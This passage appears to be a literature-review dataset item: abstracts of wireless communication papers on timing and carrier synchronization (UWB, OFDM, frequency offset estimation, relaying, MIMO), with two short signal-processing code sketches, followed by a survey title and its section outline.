method followed by the discrete Fourier transform. 
We develop an MMSE equalizer and its approximate version with low complexity. We also derive the probability density functions of the UWB channel path delays, and using them we present several optimization criteria for our proposed synchronization, channel estimation, and equalization. The effectiveness of our proposed methods and optimization criteria are confirmed by computer simulation results. --- paper_title: Training-Based Synchronization and Demodulation With Low Complexity for UWB Signals paper_content: In this paper, we propose a low-complexity data-aided (DA) synchronization and efficient demodulation technique for an ultrawideband (UWB) impulse radio system. Depending on the autocorrelation property of a judiciously chosen training sequence, a redundance-included demodulation template (RDT) can be extracted from the received signal by separating, shifting, and realigning two connected portions in the observation window. After constructing the RDT, two receiver designs are available. One approach is to demodulate transmitted symbols by correlating the RDT in a straightforward manner, which does not require the explicit timing acquisition and, thus, considerably reduces the complexity of the receiver. An alternative approach is accomplished with the assistance of a non-RDT (NRDT). The NRDT-based receiver is able to remove the redundant noisy component of the RDT by acquiring timing offset via a simple synchronization scheme, therefore achieving a better bit error rate (BER) performance. Both the schemes can counteract the effects of interframe interference (IFI) and unknown multipath channels. Furthermore, analytical performance evaluations of the RDT- and NRDT-based receivers are provided. Simulations verify the realistic performance of the proposed receivers in the presence of multiuser interference (MUI) and timing errors. --- paper_title: A generalized RAKE receiver for interference suppression paper_content: Currently, a global third-generation cellular system based on code-division multiple-access (CDMA) is being developed with a wider bandwidth than existing second-generation systems. The wider bandwidth provides increased multipath resolution in a time-dispersive channel, leading to higher frequency-selectivity. A generalized RAKE receiver for interference suppression and multipath mitigation is proposed. The receiver exploits the fact that time dispersion significantly distorts the interference spectrum from each base station in the downlink of a wideband CDMA system. Compared to the conventional RAKE receiver, this generalized RAKE receiver may have more fingers and different combining weights. The weights are derived from a maximum likelihood formulation, modeling the intracell interference as colored Gaussian noise. This low-complexity detector is especially useful for systems with orthogonal downlink spreading codes, as orthogonality between own cell signals cannot be maintained in a frequency-selective channel. The performance of the proposed receiver is quantified via analysis and simulation for different dispersive channels, including Rayleigh fading channels. Gains on the order of 1-3.5 dB are achieved, depending on the dispersiveness of the channel, with only a modest increase in the number of fingers. For a wideband CDMA (WCDMA) system and a realistic mobile radio channel, this translates to capacity gains of the order of 100%. 
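In its standard form, the generalized RAKE combining summarized in the last abstract above weights the despread finger outputs by the inverse of the impairment (interference-plus-noise) covariance, w = R_u^{-1} h; when R_u is a scaled identity this collapses to conventional maximal-ratio RAKE combining. The minimal sketch below only illustrates that combining rule with assumed variable names; it is not the cited receiver design.

```python
# Minimal generalized-RAKE combining sketch for BPSK (assumed inputs).
import numpy as np

def grake_weights(h, R_u):
    """Combining weights w = R_u^{-1} h for finger channel estimates h and
    impairment covariance R_u across the fingers."""
    return np.linalg.solve(R_u, h)

def grake_detect(y, h, R_u):
    """Combine the despread finger outputs y and take a hard BPSK decision."""
    w = grake_weights(h, R_u)
    z = np.vdot(w, y)                 # w^H y
    return 1 if z.real >= 0 else -1
```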
--- paper_title: Traffic-reduced precise ranging protocol for asynchronous UWB positioning networks paper_content: This letter proposes a precise two-way ranging (TWR) protocol toward low traffic for asynchronous UWB positioning networks. The proposed TWR protocol pursuing instantaneous ranging update enables the estimation of clock frequency offset to achieve high ranging accuracy. Theoretical analysis and simulation results verify the performance. --- paper_title: Robust, Low-Complexity, and Energy Efficient Downlink Baseband Receiver Design for MB-OFDM UWB System paper_content: This paper presents optimized synchronization algorithms and architecture designs of a downlink baseband receiver for multiband orthogonal frequency division multiplexing ultra wideband (MB-OFDM UWB). The receiver system targets low complexity and low power under the premise of good performance. At the algorithm level, a dual-threshold (DT) detection method is proposed for robust detection performance in timing synchronization; a multipartite table method (MTM) is employed to implement arctangent and sin/cos functions in coarse frequency synchronization. MTM outperforms other state-of-the-art methods in power and area. A highly simplified phase tracking method is proposed with better performance in fine frequency synchronization. At the architecture level, we focus on optimizing the matched filter of the packet detector, the carrier frequency offset (CFO) corrector, and the FFT output reorder buffer. The proposed downlink baseband receiver is implemented in 0.13 μm CMOS technology. The core area of the layout is 2.66 × 0.94 mm², which saves 45.1% of the hardware cost due to the low-complexity synchronization algorithms and architecture optimization. The postlayout power consumption is 170 mW at 132 MHz clock frequency, which is equivalent to 88 pJ/b energy efficiency at 480 Mbps data rate. --- paper_title: Blind frequency-offset tracking scheme for multiband orthogonal frequency division multiplexing using time-domain spreading paper_content: A blind scheme for estimating the residual carrier-frequency offset of multiband orthogonal frequency division multiplexing (MB-OFDM)-based ultra-wideband (UWB) systems is proposed. In the MB-OFDM UWB system, time-domain spreading (TDS) is used by transmitting the same information across two adjacent OFDM symbols. By using the TDS structure, the proposed frequency estimation scheme does not require the use of pilot symbols. To demonstrate the usefulness of the proposed estimator, an analytical expression of the mean square error is derived and the performance is compared with a conventional pilot-assisted estimator. --- paper_title: Data-Aided Timing Synchronization for FM-DCSK UWB Communication Systems paper_content: Frequency-modulated differential chaos shift keying (FM-DCSK) ultrawideband (UWB) communication systems convey information by transmitting ultrashort chaotic pulses (in the nanosecond scale). Since such pulses are ultrashort, timing offset may severely degrade the bit error rate (BER) performance. In this paper, a fast data-aided timing synchronization algorithm with low complexity is proposed for FM-DCSK UWB systems, which capitalizes on the excellent correlation characteristic of chaotic signals. Simulation results show that the BER performance of such systems is fairly close to that of perfect timing thanks to the proposed new algorithm.
Moreover, the new algorithm requires less synchronization searching time and lower computational complexity than the conventional one for transmitted reference UWB systems existing in the current literature. --- paper_title: Improved fine CFO synchronization for MB-OFDM UWB paper_content: Proposed is an improved blind carrier frequency offset (CFO) estimator suitable for Multi-Band OFDM Ultra Wideband (MB-OFDM UWB) system. By exploiting the conjugate symmetry of the physical layer convergence protocol (PLCP) the need for training symbols can be avoided and estimation performance is improved as well. Computer simulations show that the proposed method achieves better estimation performance than existing method. --- paper_title: Schmidl-Cox-like Frequency Offset Estimation in Time-Hopping UWB paper_content: This paper presents a time hopping ultra wide band (TH-UWB) receiver design targeted to high performance and low complexity. The classical Schmidl and Cox idea of extracting the frequency offset from the phase of a correlation measure between two identical transmitted signals is here extended to a TH format. The algorithm exploits the low duty cycle of the time hopping access, and combines received samples in order to strengthen the signal-to-noise ratio. A clever selection of which samples to use in the correlation measure (first and last third of the received signal) is proved to perform 0.5 dB from the Cramer-Rao lower bound, thus providing an improvement of 0.75 dB with respect to the standard approach of the literature (correlating the first and second halves of the received signal). A modified algorithm that suitably weights received samples is also proposed for achieving robustness in impulsive multiple user access scenarios. --- paper_title: Ultrawideband radio design: the promise of high-speed, short-range wireless connectivity paper_content: The paper provides a tutorial overview of ultrawideband (UWB) radio technology for high-speed wireless connectivity. Subsequent to establishing a historical and technological context, it describes the new impetus for UWB systems development and standardization resulting from the FCC's recent decision to permit unlicensed operation in the 3.1-10.6 GHz band subject to modified Part 15 rules and indicates the potential new applications that may result. Thereafter, the paper provides a system architect's perspectives on the various issues and challenges involved in the design of link layer subsystems. Specifically, we outline current developments in UWB system design concepts that are oriented to high-speed applications and describe some of the design tradeoffs involved. --- paper_title: Maximum Likelihood Frequency Offset Estimation in Multiple Access Time-Hopping UWB paper_content: Frequency offset estimation for time-hopping (TH) ultra-wide-band (UWB) is addressed in the literature by relying on an AWGN assumption and by exploiting a periodic preamble appended to each packet. In this paper we generalize these techniques with two aims. First, we identify a solution which does not rely on any periodic structure, but can be implemented with a generic TH format. Second, we identify a solution which is robust to multiple access interference (MAI) by assuming a Gaussian mixture (GM) model for MAI. In fact, GMs have recently been identified as good descriptors of UWB interference, and they provide closed form and limited complexity results. With these ideas in mind, we build a data aided maximum likelihood (ML) estimator. 
The proposed ML solution shows quasi optimum performance in the Cramer-Rao bound sense, and proves to be robust in meaningful multiple user scenarios. --- paper_title: Resource Efficient Implementation of Low Power MB-OFDM PHY Baseband Modem With Highly Parallel Architecture paper_content: The multi-band orthogonal frequency-division multiplexing modem needs to process large amount of computations in short time for support of high data rates, i.e., up to 480 Mbps. In order to satisfy the performance requirement while reducing power consumption, a multi-way parallel architecture has been proposed. But the use of the high degree parallel architecture would increase chip resource significantly, thus a resource efficient design is essential. In this paper, we introduce several novel optimization techniques for resource efficient implementation of the baseband modem which has highly, i.e., 8-way, parallel architecture, such as new processing structures for a (de)interleaver and a packet synchronizer and algorithm reconstruction for a carrier frequency offset compensator. Also, we describe how to efficiently design several other components. The detailed analysis shows that our optimization technique could reduce the gate count by 27.6% on average, while none of techniques degraded the overall system performance. With 0.18-μm CMOS process, the gate count and power consumption of the entire baseband modem were about 785 kgates and less than 381 mW at 66 MHz clock rate, respectively. --- paper_title: Maximum Likelihood Frequency Estimation and Preamble Identification in OFDMA-based WiMAX Systems paper_content: In multi-cellular WiMAX systems based on orthogonal frequency-division multiple-access (OFDMA), the training preamble is chosen from a set of known sequences so as to univocally identify the transmitting base station. Therefore, in addition to timing and frequency synchronization, preamble index identification is another fundamental task that a mobile terminal must successfully complete before establishing a communication link with the base station. In this work we investigate the joint maximum likelihood (ML) estimation of the carrier frequency offset (CFO) and preamble index in a multicarrier system compliant with the WiMAX specifications, and derive a novel expression of the relevant Cramer-Rao bound (CRB). Since the exact ML solution is prohibitively complex in its general formulation, suboptimal algorithms are developed which can provide a reasonable trade-off between estimation accuracy and processing load. Specifically, we show that the fractional CFO can be recovered by combining the ML estimator with an existing algorithm that attains the CRB in all practical scenarios. The integral CFO and preamble index are subsequently retrieved by a suitable approximation of their joint ML estimator. Compared to existing alternatives, the resulting scheme exhibits improved accuracy and reduced sensitivity to residual timing errors. The price for these advantages is a certain increase of the system complexity. --- paper_title: Improved frequency offset estimation scheme for UWB systems with cyclic delay diversity paper_content: This paper proposes an improved pilot-based algorithm for joint estimation of carrier frequency offset (CFO) and sampling frequency offset (SFO) in ultrawideband orthogonal frequency division multiplexing (UWB-OFDM) systems with cyclic delay diversity. 
By proper selection of cyclic delay time and a frequency band with maximum channel power, a joint estimation of CFO and SFO is derived. Via computer simulation and analysis, the proposed frequency estimator is shown to benefit from the properly selected delay parameter and frequency band. --- paper_title: Ultra-Wideband TOA Estimation in the Presence of Clock Frequency Offset paper_content: The paper is concerned with the impact of clock frequency offsets on the accuracy of ranging systems based on time of arrival (TOA) measurements. It is shown that large TOA errors are incurred if the transmitter and receiver clocks are mistuned by more than just one part per million (ppm). This represents a serious obstacle to the use of commercial low-cost quartz oscillators, as they exhibit frequency drifts in the range of ± 10 ppm and more. A solution is to estimate first the transmitter clock frequency relative to the receiver's and then compensate for the difference by acting on the receiver clock tuning. An algorithm is proposed that estimates the transmitter clock frequency with an accuracy better than 0.1 ppm. Computer simulations indicate that its use in ranging systems makes TOA measurements as good as those obtained with perfectly synchronous clocks. --- paper_title: Receiver Design for Single-Frequency Networks with Fast-Varying Channels paper_content: SC-FDE (Single Carrier Frequency-Domain Equalization) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper we consider the use of SC-FDE schemes in broadcast and multicast systems with SFN (Single Frequency Network) operation where we do not have perfect carrier synchronization between different transmitters. We study the impact of different CFO (Carrier Frequency Offset) between the local oscillator at the receiver and the local oscillator at each transmitter. We also propose receiver structures able to reduce the performance degradation caused by different CFO at different transmitters. Our receivers can be regarded as modified turbo equalizer implemented in the frequency-domain, where a frequency offset compensation is performed before the iterative receiver. --- paper_title: A Synchronization Design for UWB-Based Wireless Multimedia Systems paper_content: Multi-band orthogonal frequency-division multiplexing (MB-OFDM) ultra-wideband (UWB) technology offers large throughput, low latency and has been adopted in wireless audio/video (AV) network products. The complexity and power consumption, however, are still major hurdles for the technology to be widely adopted. In this paper, we propose a unified synchronizer design targeted for MB-OFDM transceiver that achieves high performance with low implementation complexity. The key component of the proposed synchronizer is a parallel auto-correlator structure in which multiple ACF units are instantiated and their outputs are shared by functional blocks in the synchronizer, including preamble signal detection, time-frequency code identification, symbol timing, carrier frequency offset estimation and frame synchronization. This common structure not only reduces the hardware cost but also minimizes the number of operations in the functional blocks in the synchronizer as the results of a large portion of computation can be shared among different functional blocks. 
To mitigate the effect of narrowband interference (NBI) on UWB systems, we also propose a low-complexity ACF-based frequency detector to facilitate the design of (adaptive) notch filter in analog/digital domain. The theoretical analysis and simulation show that the performance of the proposed design is close to optimal, while the complexity is significantly reduced compared to existing work. --- paper_title: Beamforming Based Receiver Scheme for DVB-T2 System in High Speed Train Environment paper_content: In this paper, the received signal from the different base stations (BSs) of the second generation of Terrestrial Digital Video Broadcasting (DVB-T2) in the high-speed-train (HST) scenario is modeled as a fast time-varying signal with the multiple Doppler frequency offsets. The interference caused by the multiple Doppler frequency offsets and the channel variations, and the signal to interference plus noise ratio of the received signal, are derived for the DVB-T2 receiver. The results of the theoretical analysis show that the interference greatly degraded the performance of the DVB-T2 system. To suppress the interference, we proposed a beamforming based receiver scheme for DVB-T2 system. By using the new signal processing scheme for the received signal vector from the antenna array, one can separate the received signal with the multiple Doppler frequency offsets into the multiple signals, each of which is with a single Doppler frequency offset. The separated signals are compensated by the corresponding Doppler frequency offsets and equalized by the estimated channel responses respectively, then combined into a signal to be demodulated. The results of the simulation show that the proposed scheme can effectively suppress the interference and greatly improve the performance of the DVB-T2 system in the HST environment. --- paper_title: Iterative Sampling Frequency Offset Estimation for MB-OFDM UWB Systems With Long Transmission Packet paper_content: A multiband orthogonal frequency-division multiplexing (MB-OFDM) system, which is one of the effective modulation techniques that have been adopted for high-speed ultrawideband (UWB) systems, is very sensitive to sampling frequency offset (SFO) due to the mismatch between local oscillators at the transmitter and the receiver. In this paper, we propose an iterative SFO estimation method for a high-data-rate MB-OFDM UWB system to improve its SFO estimation accuracy in the case of a long transmission packet. The proposed method is an iterative process of 2-D SFO estimation across pilot subcarriers and consecutive OFDM symbols, together with joint channel estimation. Furthermore, we derive the Cramer-Rao lower bound (CRLB) for the proposed SFO estimation method. This CRLB can be used as a guide for algorithm design and to explore the theoretical limit. Our performance analysis and simulation results show that the proposed iterative SFO estimation method is both practical and effective. --- paper_title: Signal Design for Reduced Complexity and Accurate Cell Search/Synchronization in OFDM-Based Cellular Systems paper_content: This paper proposes a variant of the frequency-domain synchronization structure specified in the long-term evolution (LTE) standard. In the proposed scheme, the primary synchronization signal used in step-1 cell search is the concatenation of a Zadoff-Chu (ZC) sequence and its conjugate (as opposed to only the ZC sequence in LTE). 
For step-2 cell search, we propose a complex scrambling sequence requiring no descrambling and a new remapped short secondary synchronization signal that randomizes the intercell interference (as opposed to the first/second scrambling sequence and swapped short signals in LTE). Through a combination of analysis and simulation, we demonstrate that the proposed synchronization signals lead to lower searcher complexity than LTE, a lower detection error rate, a shorter mean cell search time, and immunity toward a frequency offset. --- paper_title: A Subspace-Based Two-Way Ranging System Using a Chirp Spread Spectrum Modem, Robust to Frequency Offset paper_content: Herein, we propose and implement a subspace-based two-way ranging system for high resolution indoor ranging that is robust to frequency offset. Due to the frequency offset between wireless nodes, issues about sampling frequency offset (SFO) and carrier frequency offset (CFO) arise in range estimation. Although the problem of SFO is resolved by adopting the symmetric double-sided two-way ranging (SDS-TWR) protocol, the CFO of the received signals impacts the time-of-arrival (TOA) estimation, obtained by conventional subspace-based algorithms such as ESPRIT and MUSIC. Nevertheless, the CFO issue has not been considered with subspace-based TOA estimation algorithms.Our proposed subspace-based algorithm, developed for the robust TOA estimation to CFO, is based on the chirp spread spectrum (CSS) signals. Our subspace-based ranging system is implemented in FPGA with CSS modem using a hardware/software co-design methodology. Simulations and experimental results show that the proposed method can achieve robust ranging between the CSS nodes in an indoor environment with frequency offset. --- paper_title: Frequency-division spread-spectrum makes frequency synchronisation easy paper_content: Frequency division spread spectrum system (FD/S3) has been recently proposed, which uses frequency domain spreading codes and can allow frequency offsets between users. Motivated by the conventional time-domain code acquisition, we propose a frequency (F)-domain code acquisition method using time (T)-domain integrator, which permits frequency offset, which leads to a new T-domain code acquisition using F-domain integrator. Recently proposed Gabor division (GD)/S3 system permits us to use both F- and T-domain code acquisitions separately and cooperatively*. --- paper_title: Self-encoded multi-carrier spread spectrum with iterative despreading for random residual frequency offset paper_content: In this study, we investigate the multi-carrier spread spectrum (MCSS) communication system which adopts the self-encoded spread spectrum in a downlink synchronous channel. It is very difficult to completely eliminate the frequency offset in practical channel scenarios. We demonstrate that the self-encoded MCSS (SE-MCSS) with iterative despreading manifests a remarkable immunity to residual frequency offset. The SE-MCSS can be an excellent candidate for the future generation of wireless services. --- paper_title: A Fast Time-Delay Estimator of PN Signals paper_content: This work proposes an effective time-delay estimator for PN satellite signals, exploiting a fast triangular interpolator, running on three estimated ambiguity samples in the neighborhood of the coarse estimate. 
Performance analysis (theory and simulation) is carried out in comparison with conventional approaches based on the interpolation, usually carried out by (time-consuming) narrow-band over-sampling or (fast) fitting of few samples of a smoothed function of the ambiguity function around its maximum. The theoretical results, substantiated by computer simulations, have evidenced that the devised method outperforms the conventional estimator for all the timing offsets and is well suited for satellite spread-spectrum communications. --- paper_title: Gabor Division/Spread Spectrum System Is Separable in Time and Frequency Synchronization paper_content: Recently proposed new Time-Domain (TD) synchronization using frequency integration and TD Spread Spectrum (SS) codes has been shown to be robust to frequency offset, that has its dual Frequency-Domain (FD) synchronization using time integration and FD SS codes which is robust to timing offset. Separable Property (SP) is defined for time-frequency synchronization under the condition containing time and frequency deviations to be performed separately and cooperatively. The SP compels us to design phase correction on SS codes and transmitted data. --- paper_title: Wireless Networks With RF Energy Harvesting: A Contemporary Survey paper_content: Radio frequency (RF) energy transfer and harvesting techniques have recently become alternative methods to power the next generation wireless networks. As this emerging technology enables proactive energy replenishment of wireless devices, it is advantageous in supporting applications with quality of service (QoS) requirement. In this paper, we present an extensive literature review on the research progresses in wireless networks with RF energy harvesting capability, referred to as RF energy harvesting networks (RF-EHNs). First, we present an overview of the RF-EHNs including system architecture, RF energy harvesting techniques and existing applications. Then, we present the background in circuit design as well as the state-of-the-art circuitry implementations, and review the communication protocols specially designed for RF-EHNs. We also explore various key design issues in the development of RF-EHNs according to the network types, i.e., single-hop network, multi-antenna network, relay network and cognitive radio network. Finally, we envision some open research directions. --- paper_title: Relaying Protocols for Wireless Energy Harvesting and Information Processing paper_content: An emerging solution for prolonging the lifetime of energy constrained relay nodes in wireless networks is to avail the ambient radio-frequency (RF) signal and to simultaneously harvest energy and process information. In this paper, an amplify-and-forward (AF) relaying network is considered, where an energy constrained relay node harvests energy from the received RF signal and uses that harvested energy to forward the source information to the destination. Based on the time switching and power splitting receiver architectures, two relaying protocols, namely, i) time switching-based relaying (TSR) protocol and ii) power splitting-based relaying (PSR) protocol are proposed to enable energy harvesting and information processing at the relay. In order to determine the throughput, analytical expressions for the outage probability and the ergodic capacity are derived for delay-limited and delay-tolerant transmission modes, respectively. 
The numerical analysis provides practical insights into the effect of various system parameters, such as energy harvesting time, power splitting ratio, source transmission rate, source to relay distance, noise power, and energy harvesting efficiency, on the performance of wireless energy harvesting and information processing using AF relay nodes. In particular, the TSR protocol outperforms the PSR protocol in terms of throughput at relatively low signal-to-noise-ratios and high transmission rate. --- paper_title: Noncooperative Cellular Wireless with Unlimited Numbers of Base Station Antennas paper_content: A cellular base station serves a multiplicity of single-antenna terminals over the same time-frequency interval. Time-division duplex operation combined with reverse-link pilots enables the base station to estimate the reciprocal forward- and reverse-link channels. The conjugate-transpose of the channel estimates are used as a linear precoder and combiner respectively on the forward and reverse links. Propagation, unknown to both terminals and base station, comprises fast fading, log-normal shadow fading, and geometric attenuation. In the limit of an infinite number of antennas a complete multi-cellular analysis, which accounts for inter-cellular interference and the overhead and errors associated with channel-state information, yields a number of mathematically exact conclusions and points to a desirable direction towards which cellular wireless could evolve. In particular the effects of uncorrelated noise and fast fading vanish, throughput and the number of terminals are independent of the size of the cells, spectral efficiency is independent of bandwidth, and the required transmitted energy per bit vanishes. The only remaining impairment is inter-cellular interference caused by re-use of the pilot sequences in other cells (pilot contamination) which does not vanish with unlimited number of antennas. --- paper_title: In-Band Full-Duplex Relaying: A Survey, Research Issues and Challenges paper_content: Recent advances in self-interference cancellation techniques enable in-band full-duplex wireless systems, which transmit and receive simultaneously in the same frequency band with high spectrum efficiency. As a typical application of in-band full-duplex wireless, in-band full-duplex relaying (FDR) is a promising technology to integrate the merits of in-band full-duplex wireless and relaying technology. However, several significant research challenges remain to be addressed before its widespread deployment, including small-size full-duplex device design, channel modeling and estimation, cross-layer/joint resource management, interference management, security, etc. In this paper, we provide a brief survey on some of the works that have already been done for in-band FDR, and discuss the related research issues and challenges. We identify several important aspects of in-band FDR: basics, enabling technologies, information-theoretical performance analysis, key design issues and challenges. Finally, we also explore some broader perspectives for in-band FDR. --- paper_title: Frequency synchronization and phase offset tracking in a real-time 60-GHz CS-OFDM MIMO system paper_content: The performance of an Orthogonal Frequency-Division-Multiplexing (OFDM)-based 60-GHz system can be strongly degraded due to carrier frequency impairment and Phase Noise (PN). 
In this paper we present a practical approach to the design of a frequency synchronization and phase offset tracking scheme for a 60-GHz, Non-Line-of-Sight (NLOS) capable wireless communication system. We first analyse the architecture of the 60-GHz system and propose a simple algorithm for Carrier Frequency Offset (CFO) estimation on the basis of numerical investigations. Then, we explore pilot based and blind tracking methods for mitigation of Residual Frequency Offset (RFO) and Common Phase Error (CPE). Provided are also analysis and implementation results on an Altera Startix III FPGA. --- paper_title: MIMO Broadcasting for Simultaneous Wireless Information and Power Transfer paper_content: Wireless power transfer (WPT) is a promising new solution to provide convenient and perpetual energy supplies to wireless networks. In practice, WPT is implementable by various technologies such as inductive coupling, magnetic resonate coupling, and electromagnetic (EM) radiation, for short-/mid-/long-range applications, respectively. In this paper, we consider the EM or radio signal enabled WPT in particular. Since radio signals can carry energy as well as information at the same time, a unified study on simultaneous wireless information and power transfer (SWIPT) is pursued. Specifically, this paper studies a multiple-input multiple-output (MIMO) wireless broadcast system consisting of three nodes, where one receiver harvests energy and another receiver decodes information separately from the signals sent by a common transmitter, and all the transmitter and receivers may be equipped with multiple antennas. Two scenarios are examined, in which the information receiver and energy receiver are separated and see different MIMO channels from the transmitter, or co-located and see the identical MIMO channel from the transmitter. For the case of separated receivers, we derive the optimal transmission strategy to achieve different tradeoffs for maximal information rate versus energy transfer, which are characterized by the boundary of a so-called rate-energy (R-E) region. For the case of co-located receivers, we show an outer bound for the achievable R-E region due to the potential limitation that practical energy harvesting receivers are not yet able to decode information directly. Under this constraint, we investigate two practical designs for the co-located receiver case, namely time switching and power splitting, and characterize their achievable R-E regions in comparison to the outer bound. --- paper_title: Improving Bandwidth Efficiency in E-band Communication Systems paper_content: The allocation of a large amount of bandwidth by regulating bodies in the 70/80 GHz band, that is, the E-band, has opened up new potentials and challenges for providing affordable and reliable gigabit-per-second wireless point-to-point links. This article first reviews the available bandwidth and licensing regulations in the E-band. Subsequently, different propagation models (e.g., the ITU-R and Cane models) are compared against measurement results, and it is concluded that to meet specific availability requirements, E-band wireless systems may need to be designed with larger fade margins compared to microwave systems. A similar comparison is carried out between measurements and models for oscillator phase noise. It is confirmed that phase noise characteristics, which are neglected by the models used for narrowband systems, need to be taken into account for the wideband systems deployed in the E-band. 
Next, a new MIMO transceiver design, termed continuous aperture phased (CAP)-MIMO, is presented. Simulations show that CAP-MIMO enables E-band systems to achieve fiber-optic-like throughputs. Finally, it is argued that full-duplex relaying can be used to greatly enhance the coverage of E-band systems without sacrificing throughput, thus facilitating their application in establishing the backhaul of heterogeneous networks. --- paper_title: In-Band Full-Duplex Wireless: Challenges and Opportunities paper_content: In-band full-duplex (IBFD) operation has emerged as an attractive solution for increasing the throughput of wireless communication systems and networks. With IBFD, a wireless terminal is allowed to transmit and receive simultaneously in the same frequency band. This tutorial paper reviews the main concepts of IBFD wireless. One of the biggest practical impediments to IBFD operation is the presence of self-interference, i.e., the interference that the modem's transmitter causes to its own receiver. This tutorial surveys a wide range of IBFD self-interference mitigation techniques. Also discussed are numerous other research challenges and opportunities in the design and analysis of IBFD wireless systems. --- paper_title: Enhanced List-based Group-wise overloaded receiver with application to satellite reception paper_content: The market trends towards the use of smaller dish antennas for TV satellite receivers, as well as the growing density of broadcasting satellites in orbit require the application of robust adjacent satellite interference (ASI) cancellation algorithms at the receivers. The wider beamwidth of a small size dish and the growing number of satellites in orbit impose an overloaded scenario, i.e., a scenario where the number of transmitting satellites exceeds the number of receiving antennas. For such a scenario, we present a two stage receiver to enhance signal detection from the satellite of interest, i.e., the satellite that the dish is pointing to, while reducing interference from neighboring satellites. Towards this objective, we propose an enhanced List-based Group-wise Search Detection (LGSD) receiver architecture that takes into account the spatially correlated additive noise and uses the signal-to-interference-plus-noise ratio (SINR) maximization criterion to improve detection performance. Simulations show that the proposed receiver structure enhances the performance of satellite systems in the presence of ASI when compared to existing methods. --- paper_title: Heterogeneous Vehicular Networking: A Survey on Architecture, Challenges, and Solutions paper_content: With the rapid development of the Intelligent Transportation System (ITS), vehicular communication networks have been widely studied in recent years. Dedicated Short Range Communication (DSRC) can provide efficient real-time information exchange among vehicles without the need of pervasive roadside communication infrastructure. Although mobile cellular networks are capable of providing wide coverage for vehicular users, the requirements of services that require stringent real-time safety cannot always be guaranteed by cellular networks. Therefore, the Heterogeneous Vehicular NETwork (HetVNET), which integrates cellular networks with DSRC, is a potential solution for meeting the communication requirements of the ITS. Although there are a plethora of reported studies on either DSRC or cellular networks, joint research of these two areas is still at its infancy. 
This paper provides a comprehensive survey on recent wireless networks techniques applied to HetVNETs. Firstly, the requirements and use cases of safety and non-safety services are summarized and compared. Consequently, a HetVNET framework that utilizes a variety of wireless networking techniques is presented, followed by the descriptions of various applications for some typical scenarios. Building such HetVNETs requires a deep understanding of heterogeneity and its associated challenges. Thus, major challenges and solutions that are related to both the Medium Access Control (MAC) and network layers in HetVNETs are studied and discussed in detail. Finally, we outline open issues that help to identify new research directions in HetVNETs. --- paper_title: Spectrum Sensing of OFDM Signals in the Presence of Carrier Frequency Offset paper_content: This paper addresses the important issue of detecting orthogonal frequency-division multiplexing (OFDM) signals in the presence of carrier frequency offset (CFO). The proposed algorithm utilizes the characteristics of the covariance matrix of the discrete Fourier transform of the input signal to the detector to determine the presence of the primary user's signal. This algorithm can be exploited to differentiate OFDM signals from the noise through the proposal of a new decision metric, which measures the off-diagonal elements of the input signal's covariance matrix. The decision threshold subject to a given probability of false alarm is derived, whereas performance analysis is carried out to demonstrate the potential of the proposed algorithm. Finally, simulation results are presented to validate the effectiveness of the proposed sensing method in comparison with other existing approaches. --- paper_title: Digital Baseband IC Design of OFDM PHY for a 60GHz Proximity Communication System paper_content: This paper presents a digital baseband IC design based on OFDM PHY for a 60GHz proximity communication system. We propose a low computational complexity OFDM demodulator with a carrier frequency offset estimation method in polar coordinates suitable for high-speed parallel architecture. The proposed architecture is implemented in 65nm CMOS technology, and is experimentally verified to achieve the PHY data rate above 2.2Gbps. The digital baseband IC includes a complete functionality of OFDM transceiver with error correcting codecs and MAC. --- paper_title: Indoor Millimeter Wave MIMO: Feasibility and Performance paper_content: In this paper, we investigate spatial multiplexing at millimeter (mm) wave carrier frequencies for short-range indoor applications by quantifying fundamental limits in line-of-sight (LOS) environments and then investigating performance in the presence of multipath and LOS blockage. Our contributions are summarized as follows. For linear arrays with constrained form factor, an asymptotic analysis based on the properties of prolate spheroidal wave functions shows that a sparse array producing a spatially uncorrelated channel matrix effectively provides the maximum number of spatial degrees of freedom in a LOS environment, although substantial beamforming gains can be obtained by using denser arrays. This motivates our proposed mm-wave MIMO architecture, which utilizes arrays of subarrays to provide both directivity and spatial multiplexing gains. System performance is evaluated in a simulated indoor environment using a ray-tracing model that incorporates multipath effects and potential LOS blockage. 
Eigenmode transmission with waterfilling power allocation serves as a performance benchmark, and is compared to the simpler scheme of beamsteering transmission with MMSE reception and a fixed signal constellation. Our numerical results provide insight into the spatial variations of attainable capacity within a room, and the combinations of beamsteering and spatial multiplexing used in different scenarios. ---
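Several of the references above (the Schmidl-Cox-like estimator for time-hopping UWB, the ACF-based MB-OFDM synchronizer, and the blind TDS tracking scheme) rely on variants of the same basic idea: a carrier frequency offset can be read off the phase of a correlation between two transmitted segments that are known to be identical. The sketch below illustrates that idea in its simplest repeated-preamble form; it is a generic Python/NumPy illustration, not code from any of the cited papers, and the function and parameter names are invented for this example.

```python
import numpy as np

def cfo_from_repeated_halves(rx, half_len, sample_rate):
    """Estimate a fractional CFO from a preamble whose second half repeats
    the first half (Schmidl-Cox-style). The unambiguous estimation range is
    +/- sample_rate / (2 * half_len)."""
    first = rx[:half_len]
    second = rx[half_len:2 * half_len]
    corr = np.vdot(first, second)        # sum(conj(first) * second)
    phase = np.angle(corr)               # residual rotation accumulated over half_len samples
    return phase * sample_rate / (2.0 * np.pi * half_len)

# Toy check: a repeated random half rotated by a 3 kHz offset at 20 MHz sampling.
rng = np.random.default_rng(0)
fs, cfo, n_half = 20e6, 3e3, 128
half = rng.standard_normal(n_half) + 1j * rng.standard_normal(n_half)
n = np.arange(2 * n_half)
rx = np.concatenate([half, half]) * np.exp(2j * np.pi * cfo * n / fs)
print(cfo_from_repeated_halves(rx, n_half, fs))   # approximately 3000.0
```

The Schmidl-Cox-like TH-UWB paper cited above refines this correlation by selecting which received samples enter it (the first and last third of the received signal rather than the two halves); that refinement is not reproduced in the sketch.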
Title: Timing and Carrier Synchronization in Wireless Communication Systems: A Survey and Classification of Research in the Last Five Years
Section 1: INTRODUCTION
Description 1: Write about the motivation, background, scope, and methodology of the survey, as well as the organization of the paper.
Section 2: SISO SYSTEMS
Description 2: Discuss the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in single-input single-output (SISO) systems.
Section 3: MULTI-ANTENNA SYSTEMS
Description 3: Explore the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in multi-antenna systems, including single-carrier and multi-carrier systems.
Section 4: COOPERATIVE RELAYING
Description 4: Review the system model, synchronization challenges, literature review, and summary of timing and carrier synchronization in cooperative relaying systems, distinguishing between decode-and-forward and amplify-and-forward modes.
